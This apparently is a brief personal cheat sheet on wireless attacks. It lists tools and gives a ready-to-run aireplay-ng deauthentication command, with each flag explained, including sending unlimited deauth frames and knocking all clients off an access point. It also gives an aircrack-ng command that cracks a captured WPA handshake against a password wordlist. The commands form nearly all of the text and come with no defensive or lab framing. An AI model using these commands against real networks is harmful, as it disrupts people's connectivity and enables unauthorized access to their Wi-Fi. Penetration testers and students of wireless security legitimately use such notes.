TODO
DeAuth
Tools :
- aircrack-ng (suite)
- MDK3
- bettercap
- Scapy
- ...
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0
-0
arms deauthentication attack mode1
is the number of deauths to send; use 0 for infinite deauths-a xx:xx:xx:xx:xx:xx
is the AP (access point) MAC (Media Access Control) address-c yy:yy:yy:yy:yy:yy
is the target client MAC address; omit to deauthenticate all clients on APwlan0
is the NIC (Network Interface Card)
Cracking Handshakes
John
Hashcat
aircrack-ng
$ aircrack-ng XX-XX-XX-XX-XX-XX_full.pcap -w /opt/SecLists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt